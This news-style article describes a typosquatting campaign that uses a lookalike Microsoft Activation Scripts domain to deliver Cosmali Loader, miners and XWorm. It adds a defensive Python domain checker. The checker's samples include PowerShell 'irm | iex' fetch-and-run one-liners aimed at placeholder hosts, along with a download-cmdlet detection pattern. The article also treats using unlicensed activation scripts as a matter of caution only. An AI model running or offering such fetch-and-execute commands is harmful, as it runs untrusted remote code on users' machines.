Windows under attack: how hackers are infecting dozens of PCs


In summary

  • Hackers exploit a simple typo in a web address almost identical to that of the Microsoft Activation Scripts to install crypto-mining software or Trojans for remote control of the PC.
  • To defend yourself, experts recommend avoiding scripts of uncertain origin, verifying every domain and command typed with extreme care and, preferably, using only legitimate software licenses.

According to IT security experts, a simple typo can turn into a very serious problem thanks to a malicious campaign that exploits a fake Windows activation page to spread malware through PowerShell. The targets are users who resort to unofficial activation scripts, often convinced that they are carrying out a relatively harmless operation and instead exposed to deep system compromise.

How this new cyber attack works

From what we know, hackers use the so-called Microsoft Activation Scripts (MAS), an open source collection of PowerShell scripts used to activate Windows and Office without a valid license. The attack mechanism is as simple as it is effective: instead of the legitimate domain used by the project, an almost identical address is proposed, differing by only one letter. It is a minimal variation, typical of typosquatting, but sufficient to divert traffic to servers controlled by the attackers.

The moment the user manually copies or types the PowerShell command with the wrong domain, the script downloads and executes malicious code, starting the infection without any obvious signs.

In recent times the threat has spread like wildfire, and several users have reported on forums and on Reddit the appearance of anomalous alerts on their computers. The messages signaled the presence of Cosmali Loader, a modular malware designed to act as a vector for further infections. Once installed, the loader is able to download and launch add-ons, including crypto-mining software and remote access trojans such as XWorm, giving attackers extensive control over compromised systems.

How to defend yourself from this threat

Since this is a rapidly expanding cyber threat, cyber security experts advise checking every command extremely carefully and not launching PowerShell scripts without knowing their source. Manually typing commands, in particular, significantly increases the risk of falling into traps based on manipulated domains.
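The domain check recommended above can be partly automated. The following is an added example, not code from the article or from the MAS project: it extracts the download host from a PowerShell one-liner and flags any host that is within one character edit of a host you have verified yourself. All host names are constructed placeholders under reserved TLDs, and the allowlist is an assumption you would fill in.

```python
import re

# Assumption: hosts you have verified yourself (constructed placeholder).
TRUSTED_HOSTS = {"get.scripts.example"}

# A host is taken from a URL, or from the first argument of a download cmdlet
# (one-liners often omit the scheme, e.g. `irm host | iex`).
HOST_RE = re.compile(
    r"(?:https?://|\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\s+(?:-\w+\s+)*['\"]?)"
    r"((?:[a-z0-9-]+\.)+[a-z]{2,})",
    re.IGNORECASE,
)

def edit_distance(a, b):
    """Levenshtein distance: insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(host, trusted=TRUSTED_HOSTS, max_distance=1):
    """Return (verdict, nearest trusted host or None) for one host name."""
    host = host.lower().rstrip(".")
    if host in trusted:
        return "trusted", host
    for good in sorted(trusted):
        if edit_distance(host, good) <= max_distance:
            return "lookalike", good  # one letter off: typosquatting pattern
    return "unknown", None

def review(command):
    """List (host, verdict, nearest) for every download host in a command."""
    return [(h.lower(), *classify(h)) for h in HOST_RE.findall(command)]

if __name__ == "__main__":
    # Constructed sample commands, not taken from the campaign.
    samples = [
        "irm https://get.scripts.example/run | iex",
        "irm get.scrpts.example | iex",
        "iwr -useb https://files.other.test/a.ps1 | iex",
    ]
    for cmd in samples:
        for host, verdict, nearest in review(cmd):
            print(f"{verdict:9} {host:22} nearest={nearest}  <- {cmd}")
```

A "lookalike" verdict means the command should not be run; an "unknown" verdict only means the host is not on your allowlist and still needs manual verification.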

Furthermore, this episode brings back into the spotlight a problem that has been known for years: unofficial activation tools are a privileged channel for the dissemination of malware. For users the danger is twofold. On the one hand there is the legal aspect linked to the use of unlicensed software; on the other, even more concrete, there is the cybersecurity risk. Seemingly harmless scripts can turn into vehicles for complex infections that are difficult to detect and remove.

In fact, those who continue to use these tools should at least understand how they work, test them in isolated environments and pay maximum attention to domains and commands. This incident, therefore, demonstrates how thin the line is between a shortcut to activate Windows and a serious security problem, capable of compromising entire operating systems in a few seconds.
